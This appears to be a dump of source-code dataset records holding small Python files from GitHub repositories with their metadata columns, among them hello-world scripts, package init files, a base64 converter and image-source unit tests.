| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 5
|
e4219dd461d70c48509c267b09b2db29c496898c
| 48
|
py
|
Python
|
hello_world.py
|
FJLEspinha/JavaPracticeHacktoberfest
|
737ca4e8e74abd575f233ed0c8462c4805e7f9da
|
[
"Apache-2.0"
] | 11
|
2016-10-27T22:01:11.000Z
|
2021-10-05T12:12:45.000Z
|
hello_world.py
|
FJLEspinha/JavaPracticeHacktoberfest
|
737ca4e8e74abd575f233ed0c8462c4805e7f9da
|
[
"Apache-2.0"
] | 20
|
2016-10-25T07:48:36.000Z
|
2021-10-10T03:43:57.000Z
|
hello_world.py
|
FJLEspinha/JavaPracticeHacktoberfest
|
737ca4e8e74abd575f233ed0c8462c4805e7f9da
|
[
"Apache-2.0"
] | 208
|
2016-10-25T08:41:36.000Z
|
2021-11-01T05:06:49.000Z
|
hello_world = 'Hello World!'
print(hello_world)
| 16
| 28
| 0.770833
| 7
| 48
| 5
| 0.428571
| 0.857143
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.104167
| 48
| 2
| 29
| 24
| 0.813953
| 0
| 0
| 0
| 0
| 0
| 0.25
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0.5
| 1
| 1
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
|
0
| 5
|
e43afc8c8886d608d333366b72823a5aee8cb990
| 28
|
py
|
Python
|
baekjoon/python/register_7287.py
|
yskang/AlgorithmPracticeWithPython
|
f7129bd1924a7961489198f0ee052d2cd1e9cf40
|
[
"MIT"
] | null | null | null |
baekjoon/python/register_7287.py
|
yskang/AlgorithmPracticeWithPython
|
f7129bd1924a7961489198f0ee052d2cd1e9cf40
|
[
"MIT"
] | null | null | null |
baekjoon/python/register_7287.py
|
yskang/AlgorithmPracticeWithPython
|
f7129bd1924a7961489198f0ee052d2cd1e9cf40
|
[
"MIT"
] | null | null | null |
print(58)
print("yskang")
| 9.333333
| 16
| 0.642857
| 4
| 28
| 4.5
| 0.75
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.083333
| 0.142857
| 28
| 2
| 17
| 14
| 0.666667
| 0
| 0
| 0
| 0
| 0
| 0.230769
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
|
0
| 5
|
e4698a4a05f90a1a5325b5f555c8b37caf301a12
| 119
|
py
|
Python
|
src/geventhttpclient/__init__.py
|
edgeware/geventhttpclient
|
4031065380fab8879faa184c813e6a692b947ca8
|
[
"MIT"
] | null | null | null |
src/geventhttpclient/__init__.py
|
edgeware/geventhttpclient
|
4031065380fab8879faa184c813e6a692b947ca8
|
[
"MIT"
] | null | null | null |
src/geventhttpclient/__init__.py
|
edgeware/geventhttpclient
|
4031065380fab8879faa184c813e6a692b947ca8
|
[
"MIT"
] | 1
|
2021-04-07T11:07:11.000Z
|
2021-04-07T11:07:11.000Z
|
# package
__version__ = "1.0a"
from geventhttpclient.client import HTTPClient
from geventhttpclient.url import URL
| 13.222222
| 46
| 0.798319
| 14
| 119
| 6.5
| 0.714286
| 0.43956
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.019608
| 0.142857
| 119
| 8
| 47
| 14.875
| 0.872549
| 0.058824
| 0
| 0
| 0
| 0
| 0.037037
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.666667
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
|
0
| 5
|
902e1b61b8d7e6efd51e726fcc243bfcad6a63cd
| 30
|
py
|
Python
|
sonaion_analysis/DataObject.py
|
Sonaion/py-sonaion-analysis
|
f4bcf2ff1ad88563e6b8ef5d5d0ab9a23e69ac92
|
[
"BSD-3-Clause"
] | 1
|
2021-10-15T06:58:56.000Z
|
2021-10-15T06:58:56.000Z
|
sonaion_analysis/DataObject.py
|
Sonaion/py-sonaion-analysis
|
f4bcf2ff1ad88563e6b8ef5d5d0ab9a23e69ac92
|
[
"BSD-3-Clause"
] | null | null | null |
sonaion_analysis/DataObject.py
|
Sonaion/py-sonaion-analysis
|
f4bcf2ff1ad88563e6b8ef5d5d0ab9a23e69ac92
|
[
"BSD-3-Clause"
] | null | null | null |
class DataAnalysis:
pass
| 7.5
| 19
| 0.7
| 3
| 30
| 7
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.266667
| 30
| 3
| 20
| 10
| 0.954545
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0.5
| 0
| 0
| 0.5
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
|
0
| 5
|
5f4a2237aaaf37b46e9c5b75fea41477b9337990
| 16
|
py
|
Python
|
test.py
|
MesaPrime/PyLauncher
|
2bccd8644fedd7af3bdc86aac06e81c92c1c4403
|
[
"MIT"
] | null | null | null |
test.py
|
MesaPrime/PyLauncher
|
2bccd8644fedd7af3bdc86aac06e81c92c1c4403
|
[
"MIT"
] | null | null | null |
test.py
|
MesaPrime/PyLauncher
|
2bccd8644fedd7af3bdc86aac06e81c92c1c4403
|
[
"MIT"
] | null | null | null |
print('yesyes')
| 8
| 15
| 0.6875
| 2
| 16
| 5.5
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.0625
| 16
| 1
| 16
| 16
| 0.733333
| 0
| 0
| 0
| 0
| 0
| 0.375
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
|
0
| 5
|
5f792f4d53479b564b3d7c51fbf92e73720fdb96
| 69
|
py
|
Python
|
ankh_slam/graph.py
|
HemaZ/ankh_slam
|
05b3486e381227f9a032653973df119d14cc0897
|
[
"MIT"
] | null | null | null |
ankh_slam/graph.py
|
HemaZ/ankh_slam
|
05b3486e381227f9a032653973df119d14cc0897
|
[
"MIT"
] | null | null | null |
ankh_slam/graph.py
|
HemaZ/ankh_slam
|
05b3486e381227f9a032653973df119d14cc0897
|
[
"MIT"
] | null | null | null |
class Graph(object):
def __init__(self, n):
self._n = n
| 13.8
| 26
| 0.565217
| 10
| 69
| 3.4
| 0.7
| 0.294118
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.304348
| 69
| 4
| 27
| 17.25
| 0.708333
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| false
| 0
| 0
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 5
|
5f81d2422c20117d43b8c9e452de869f07a8ac58
| 174
|
py
|
Python
|
Solutions/5kyu/5kyu_base64_numeric_translator.py
|
citrok25/Codewars-1
|
dc641c5079e2e8b5955eb027fd15427e5bdb2e26
|
[
"MIT"
] | 46
|
2017-08-24T09:27:57.000Z
|
2022-02-25T02:24:33.000Z
|
Solutions/5kyu/5kyu_base64_numeric_translator.py
|
abbhishek971/Codewars
|
9e761811db724da1e8aae44594df42b4ee879a16
|
[
"MIT"
] | null | null | null |
Solutions/5kyu/5kyu_base64_numeric_translator.py
|
abbhishek971/Codewars
|
9e761811db724da1e8aae44594df42b4ee879a16
|
[
"MIT"
] | 35
|
2017-08-01T22:09:48.000Z
|
2022-02-18T17:21:37.000Z
|
ALPHABET = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/'
def base64_to_base10(s):
return sum(ALPHABET.index(j)*64**i for i,j in enumerate(s[::-1]))
| 34.8
| 77
| 0.770115
| 21
| 174
| 6.285714
| 0.809524
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.107595
| 0.091954
| 174
| 4
| 78
| 43.5
| 0.727848
| 0
| 0
| 0
| 0
| 0
| 0.367816
| 0.367816
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| false
| 0
| 0
| 0.333333
| 0.666667
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 5
|
39733d1f252472c80454bdeada0d06a15d16a1ca
| 174
|
py
|
Python
|
colorline/test/test1.py
|
houluy/colorline
|
27127ab8e1558b7fe9ac39a52feb95468e3d5ac6
|
[
"MIT"
] | 1
|
2018-02-19T18:06:50.000Z
|
2018-02-19T18:06:50.000Z
|
colorline/test/test1.py
|
houluy/colorline
|
27127ab8e1558b7fe9ac39a52feb95468e3d5ac6
|
[
"MIT"
] | null | null | null |
colorline/test/test1.py
|
houluy/colorline
|
27127ab8e1558b7fe9ac39a52feb95468e3d5ac6
|
[
"MIT"
] | null | null | null |
from unittest import TestCase
from colorline import cprint
class TestEnd(TestCase):
def test_end(self):
cprint('test newline', end='')
print('newline')
| 19.333333
| 38
| 0.678161
| 21
| 174
| 5.571429
| 0.666667
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.218391
| 174
| 8
| 39
| 21.75
| 0.860294
| 0
| 0
| 0
| 0
| 0
| 0.109195
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.166667
| false
| 0
| 0.333333
| 0
| 0.666667
| 0.5
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 1
|
0
| 5
|
f2cc6d4ef34a94a338677cdf7b8b3939a63c5462
| 221
|
py
|
Python
|
taxonomy_matcher/match_patterns/__init__.py
|
tilaboy/taxonomy-matcher
|
ac74e2cffc3b999bf800511987dcf0ddae1513bc
|
[
"MIT"
] | 1
|
2021-10-09T12:23:27.000Z
|
2021-10-09T12:23:27.000Z
|
taxonomy_matcher/match_patterns/__init__.py
|
tilaboy/gazetteer-matcher
|
ac74e2cffc3b999bf800511987dcf0ddae1513bc
|
[
"MIT"
] | 197
|
2019-08-12T03:18:02.000Z
|
2022-03-28T09:37:20.000Z
|
taxonomy_matcher/match_patterns/__init__.py
|
tilaboy/taxonomy-matcher
|
ac74e2cffc3b999bf800511987dcf0ddae1513bc
|
[
"MIT"
] | null | null | null |
# import all pattern classes here
from .patterns_gz import PatternsGZ
from .patterns_ct import PatternsCT
from .patterns_nt import PatternsNT
__all__ = ['PatternsGZ', 'PatternsCT', 'PatternsNT']
name = 'match_patterns'
| 24.555556
| 52
| 0.791855
| 27
| 221
| 6.185185
| 0.555556
| 0.215569
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.126697
| 221
| 8
| 53
| 27.625
| 0.865285
| 0.140271
| 0
| 0
| 0
| 0
| 0.234043
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.6
| 0
| 0.6
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
|
0
| 5
|
f2fc06c5b953fb9f371cd602dd60bb3dae46af55
| 96
|
py
|
Python
|
enthought/envisage/ui/action/location.py
|
enthought/etsproxy
|
4aafd628611ebf7fe8311c9d1a0abcf7f7bb5347
|
[
"BSD-3-Clause"
] | 3
|
2016-12-09T06:05:18.000Z
|
2018-03-01T13:00:29.000Z
|
enthought/envisage/ui/action/location.py
|
enthought/etsproxy
|
4aafd628611ebf7fe8311c9d1a0abcf7f7bb5347
|
[
"BSD-3-Clause"
] | 1
|
2020-12-02T00:51:32.000Z
|
2020-12-02T08:48:55.000Z
|
enthought/envisage/ui/action/location.py
|
enthought/etsproxy
|
4aafd628611ebf7fe8311c9d1a0abcf7f7bb5347
|
[
"BSD-3-Clause"
] | null | null | null |
# proxy module
from __future__ import absolute_import
from envisage.ui.action.location import *
| 24
| 41
| 0.833333
| 13
| 96
| 5.769231
| 0.769231
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.114583
| 96
| 3
| 42
| 32
| 0.882353
| 0.125
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 5
|
8401e27cfb37d5389aae9d223e43d5dc62988ebc
| 38
|
py
|
Python
|
__main__.py
|
csudre/NMJ_Analyser
|
75cb8a0e130d84946871cb1a6c7cca42b80cc6ae
|
[
"Apache-2.0"
] | null | null | null |
__main__.py
|
csudre/NMJ_Analyser
|
75cb8a0e130d84946871cb1a6c7cca42b80cc6ae
|
[
"Apache-2.0"
] | 1
|
2022-03-13T21:57:11.000Z
|
2022-03-13T21:57:11.000Z
|
__main__.py
|
csudre/NMJ_Analyser
|
75cb8a0e130d84946871cb1a6c7cca42b80cc6ae
|
[
"Apache-2.0"
] | null | null | null |
from .nmj_analyzer import main
main()
| 12.666667
| 30
| 0.789474
| 6
| 38
| 4.833333
| 0.833333
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.131579
| 38
| 2
| 31
| 19
| 0.878788
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.5
| 0
| 0.5
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 5
|
84184cdad55785e0e6fdc4e2f5dcda318619b853
| 115
|
py
|
Python
|
noxrating/__main__.py
|
JPAntonisse/nox-spellenzolder-rating
|
74a11c5fe93766140f0aaa5bc5a99d7ee5afc24d
|
[
"MIT"
] | 2
|
2021-01-05T16:21:58.000Z
|
2021-01-05T19:14:24.000Z
|
noxrating/__main__.py
|
JPAntonisse/nox-spellenzolder-rating
|
74a11c5fe93766140f0aaa5bc5a99d7ee5afc24d
|
[
"MIT"
] | null | null | null |
noxrating/__main__.py
|
JPAntonisse/nox-spellenzolder-rating
|
74a11c5fe93766140f0aaa5bc5a99d7ee5afc24d
|
[
"MIT"
] | null | null | null |
"""
NoxRating Main Logic
"""
if __name__ == "__main__":
from noxrating import noxrating
noxrating.main()
| 12.777778
| 35
| 0.669565
| 12
| 115
| 5.75
| 0.583333
| 0.376812
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.208696
| 115
| 9
| 36
| 12.777778
| 0.758242
| 0.173913
| 0
| 0
| 0
| 0
| 0.090909
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.333333
| 0
| 0.333333
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 5
|
ffdd7ca21c7fe9a68c3e2ba6c1103c7f3aa4ee42
| 24
|
py
|
Python
|
wind/__init__.py
|
touqir14/Wind
|
01eea6b1d40058a3c33ed4c156a62050e8771f71
|
[
"MIT"
] | null | null | null |
wind/__init__.py
|
touqir14/Wind
|
01eea6b1d40058a3c33ed4c156a62050e8771f71
|
[
"MIT"
] | null | null | null |
wind/__init__.py
|
touqir14/Wind
|
01eea6b1d40058a3c33ed4c156a62050e8771f71
|
[
"MIT"
] | null | null | null |
from .wind import Server
| 24
| 24
| 0.833333
| 4
| 24
| 5
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.125
| 24
| 1
| 24
| 24
| 0.952381
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 5
|
fffb508390e5d3e5ebe9fcbb206e8e8e7b57d61c
| 185
|
py
|
Python
|
drivers/import_file.py
|
ndkjing/usv
|
132e021432a0344a22914aaf68da7d7955d7331f
|
[
"MIT"
] | null | null | null |
drivers/import_file.py
|
ndkjing/usv
|
132e021432a0344a22914aaf68da7d7955d7331f
|
[
"MIT"
] | null | null | null |
drivers/import_file.py
|
ndkjing/usv
|
132e021432a0344a22914aaf68da7d7955d7331f
|
[
"MIT"
] | 1
|
2021-09-04T10:27:30.000Z
|
2021-09-04T10:27:30.000Z
|
import os
import sys
root_dir = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
sys.path.append(root_dir)
from utils import log
from drivers import pi_softuart
import config
| 26.428571
| 70
| 0.816216
| 32
| 185
| 4.5
| 0.53125
| 0.125
| 0.180556
| 0.208333
| 0.222222
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.091892
| 185
| 7
| 71
| 26.428571
| 0.857143
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.714286
| 0
| 0.714286
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
|
0
| 5
|
082c3fa34f3a9060b442e3434aa35bc00d0538c1
| 101
|
py
|
Python
|
accounts/permissions/__init__.py
|
Selfnet/sipam
|
32d7fde288cf7200cde170eadbd6b3541fa730fe
|
[
"Apache-2.0"
] | 2
|
2020-04-19T20:00:32.000Z
|
2022-01-01T21:00:06.000Z
|
accounts/permissions/__init__.py
|
Selfnet/sipam
|
32d7fde288cf7200cde170eadbd6b3541fa730fe
|
[
"Apache-2.0"
] | 7
|
2020-06-05T22:41:24.000Z
|
2022-02-28T01:42:45.000Z
|
accounts/permissions/__init__.py
|
Selfnet/sipam
|
32d7fde288cf7200cde170eadbd6b3541fa730fe
|
[
"Apache-2.0"
] | null | null | null |
from .readonly import AuthenticatedReadOnly, ReadOnlyToken
from .write import UserAccess, WriteToken
| 33.666667
| 58
| 0.861386
| 10
| 101
| 8.7
| 0.8
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.09901
| 101
| 2
| 59
| 50.5
| 0.956044
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 5
|
0851a082185e30210a76b9484aa3e4147e0b34e3
| 100
|
py
|
Python
|
example_python_codes/class_test.py
|
sergeybok/exploring-minecraft
|
f6c02767beea4215d607f7215e109d6adcef363a
|
[
"Apache-2.0"
] | 1
|
2019-04-06T12:50:28.000Z
|
2019-04-06T12:50:28.000Z
|
example_python_codes/class_test.py
|
sergeybok/exploring-minecraft
|
f6c02767beea4215d607f7215e109d6adcef363a
|
[
"Apache-2.0"
] | null | null | null |
example_python_codes/class_test.py
|
sergeybok/exploring-minecraft
|
f6c02767beea4215d607f7215e109d6adcef363a
|
[
"Apache-2.0"
] | null | null | null |
#import env_class
from env_class_package import env_class
env1 = env_class.env()
env1.print_info()
| 16.666667
| 39
| 0.81
| 17
| 100
| 4.411765
| 0.470588
| 0.426667
| 0.373333
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.022472
| 0.11
| 100
| 5
| 40
| 20
| 0.820225
| 0.16
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.333333
| 0
| 0.333333
| 0.333333
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
|
0
| 5
|
f23b660b12c7fcbfcd9dd6b6a059c4f42d9b5d3d
| 35
|
py
|
Python
|
ted_sws/notice_packager/adapters/__init__.py
|
meaningfy-ws/ted-xml-2-rdf
|
ac26a19f3761b7cf79d79a46be6323b658f067eb
|
[
"Apache-2.0"
] | 1
|
2022-03-21T12:32:52.000Z
|
2022-03-21T12:32:52.000Z
|
ted_sws/notice_packager/adapters/__init__.py
|
meaningfy-ws/ted-xml-2-rdf
|
ac26a19f3761b7cf79d79a46be6323b658f067eb
|
[
"Apache-2.0"
] | 24
|
2022-02-10T10:43:56.000Z
|
2022-03-29T12:36:21.000Z
|
ted_sws/notice_packager/adapters/__init__.py
|
meaningfy-ws/ted-sws
|
d1e351eacb2900f84ec7edc457e49d8202fbaff5
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/python3
# __init__.py
| 7
| 18
| 0.657143
| 5
| 35
| 3.8
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.033333
| 0.142857
| 35
| 4
| 19
| 8.75
| 0.6
| 0.828571
| 0
| null | 0
| null | 0
| 0
| null | 0
| 0
| 0
| null | 1
| null | true
| 0
| 0
| null | null | null | 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 5
|
f2615ee66090c4cb3c41d00cfd9541cbdf5ac5bc
| 5,669
|
py
|
Python
|
tests/test.py
|
ricshaw/imagesource
|
74042fa9d8755d53c15412785b828372a09c0082
|
[
"MIT"
] | 1
|
2018-12-10T10:16:36.000Z
|
2018-12-10T10:16:36.000Z
|
tests/test.py
|
ricshaw/imagesource
|
74042fa9d8755d53c15412785b828372a09c0082
|
[
"MIT"
] | null | null | null |
tests/test.py
|
ricshaw/imagesource
|
74042fa9d8755d53c15412785b828372a09c0082
|
[
"MIT"
] | 1
|
2021-08-23T15:51:03.000Z
|
2021-08-23T15:51:03.000Z
|
# -*- coding: utf-8 -*-
import imagesource
import hashlib
import cv2
import tempfile
import os.path
import shutil
from nose.tools import eq_
files_template = 'tests/data/frames/%03d.jpg'
video = 'tests/data/MOV02522.MPG'
def test_files():
hashes_rgb = {}
hashes_bgr = {}
for i in range(10):
filename = files_template % i
img = cv2.imread(filename)
assert img is not None, 'Can''t load ' + filename
hashes_bgr[i] = hashlib.md5(img).hexdigest()
hashes_rgb[i] = hashlib.md5(cv2.cvtColor(img, cv2.COLOR_BGR2RGB)).hexdigest()
images = imagesource.FilesSource(files_template)
img = images.get_image(2)
eq_(hashlib.md5(img).hexdigest(), hashes_rgb[2])
img = images.get_next_image()
eq_(hashlib.md5(img).hexdigest(), hashes_rgb[3])
images.rewind()
img = images.get_next_image()
eq_(hashlib.md5(img).hexdigest(), hashes_rgb[0])
images.color_conversion_from_bgr = None
img = images.get_image(2)
eq_(hashlib.md5(img).hexdigest(), hashes_bgr[2])
img = images.get_next_image()
eq_(hashlib.md5(img).hexdigest(), hashes_bgr[3])
images.rewind()
img = images.get_next_image()
eq_(hashlib.md5(img).hexdigest(), hashes_bgr[0])
# tmp_dir = tempfile.TemporaryDirectory() # from Python 3.2
# tmp_dir.name
tmp_dir = tempfile.mkdtemp()
tmp_file_template = os.path.join(tmp_dir, '%03d.png')
images.write_images(tmp_file_template, 10)
for i in range(10):
filename = tmp_file_template % i
img = cv2.imread(filename)
eq_(hashlib.md5(img).hexdigest(), hashes_bgr[i])
shutil.rmtree(tmp_dir) # not needed with tempfile.TemporaryDirectory()
def test_video():
hashes_rgb = {}
hashes_bgr = {}
cap = cv2.VideoCapture(video)
for i in range(10):
retval, img = cap.read()
assert retval
hashes_bgr[i] = hashlib.md5(img).hexdigest()
hashes_rgb[i] = hashlib.md5(cv2.cvtColor(img, cv2.COLOR_BGR2RGB)).hexdigest()
images = imagesource.VideoSource(video)
img = images.get_image(2)
eq_(hashlib.md5(img).hexdigest(), hashes_rgb[2])
img = images.get_next_image()
eq_(hashlib.md5(img).hexdigest(), hashes_rgb[3])
images.rewind()
img = images.get_next_image()
eq_(hashlib.md5(img).hexdigest(), hashes_rgb[0])
images.accurate_slow_seek = True
img = images.get_image(8)
eq_(hashlib.md5(img).hexdigest(), hashes_rgb[8])
img = images.get_image(7)
eq_(hashlib.md5(img).hexdigest(), hashes_rgb[7])
images.accurate_slow_seek = False
img = images.get_image(8)
# eq_(hashlib.md5(img).hexdigest(), hashes_rgb[8]) # the images may differ
img = images.get_image(7)
# eq_(hashlib.md5(img).hexdigest(), hashes_rgb[7]) # the images may differ
images.accurate_slow_seek = True
images.color_conversion_from_bgr = None
img = images.get_image(2)
eq_(hashlib.md5(img).hexdigest(), hashes_bgr[2])
img = images.get_next_image()
eq_(hashlib.md5(img).hexdigest(), hashes_bgr[3])
images.rewind()
img = images.get_next_image()
eq_(hashlib.md5(img).hexdigest(), hashes_bgr[0])
# tmp_dir = tempfile.TemporaryDirectory() # from Python 3.2
# tmp_dir.name
tmp_dir = tempfile.mkdtemp()
tmp_file_template = os.path.join(tmp_dir, '%03d.png')
images.write_images(tmp_file_template, 10)
for i in range(10):
filename = tmp_file_template % i
img = cv2.imread(filename)
eq_(hashlib.md5(img).hexdigest(), hashes_bgr[i])
shutil.rmtree(tmp_dir) # not needed with tempfile.TemporaryDirectory()
def test_timedvideo():
images = imagesource.TimedVideoSource(video)
images.extract_timestamps()
assert images.timestamps_ms is not None
# def test_mass_timedvideo():
# import fnmatch
# import os
#
# matches = []
# for root, dirnames, filenames in os.walk('...somepath...'):
# for filename in fnmatch.filter(filenames, '*.avi'):
# matches.append(os.path.join(root, filename))
# for filename in fnmatch.filter(filenames, '*.AVI'):
# matches.append(os.path.join(root, filename))
# for filename in fnmatch.filter(filenames, '*.mp4'):
# matches.append(os.path.join(root, filename))
# for filename in fnmatch.filter(filenames, '*.MP4'):
# matches.append(os.path.join(root, filename))
#
# for video_file in matches:
# print video_file
# images = imagesource.TimedVideoSource(video_file)
# images.extract_timestamps()
# assert images.timestamps_ms is not None
# print images.timestamps_ms[:30]
def test_synchronized():
hashes_rgb = {}
for i in range(10):
filename = files_template % i
